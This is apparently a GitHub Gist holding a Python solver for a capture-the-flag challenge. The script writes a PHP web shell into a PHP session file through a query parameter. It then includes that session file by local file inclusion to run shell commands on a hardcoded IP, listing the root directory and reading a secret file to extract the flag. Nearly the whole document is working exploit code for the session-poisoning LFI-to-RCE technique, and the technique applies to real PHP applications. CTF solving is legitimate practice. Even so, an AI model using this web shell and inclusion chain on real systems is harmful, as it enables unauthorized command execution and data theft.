Created
December 27, 2022 11:46
-
-
Save Aviksaikat/60e6b65e2524c188d0f4486411a07f06 to your computer and use it in GitHub Desktop.
get the flag OOPs style
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import re | |
from requests import Session | |
class RCE: | |
def __init__(self, url): | |
self.s = Session() | |
self.url = url | |
def send_payload(self): | |
self.s.get(self.url + "?karma=" + "<?php system($_GET['jadu']); ?>") | |
def payload(self, cookie, cmd=None): | |
if cmd: | |
return f"?karma=/tmp/sess_{cookie}&jadu={cmd}" | |
else: | |
return f"?karma=/tmp/sess_{cookie}" | |
def run(self): | |
r = self.s.get(self.url) | |
# get the location of the session file | |
cookie = r.cookies.get_dict()["PHPSESSID"] | |
r = self.s.get(self.url + self.payload(cookie)) | |
self.send_payload() | |
r = self.s.get(self.url + self.payload(cookie, "ls /")) | |
file = re.findall("seCretJutsuToKillBorUtoKun.txt", r.text)[0] | |
if len(file) == 0: | |
print("Oops something wrong no output found!!") | |
exit(-1) | |
self.send_payload() | |
r = self.s.get(self.url + self.payload(cookie, f"cat /{file}")) | |
msg = r.text.split(":")[-1] | |
print(msg) | |
flag = re.findall("FLAG{.*}", msg)[-1] | |
print("\nFlag: " + flag) | |
def main(): | |
rce = RCE("http://44.200.237.73/") | |
rce.run() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment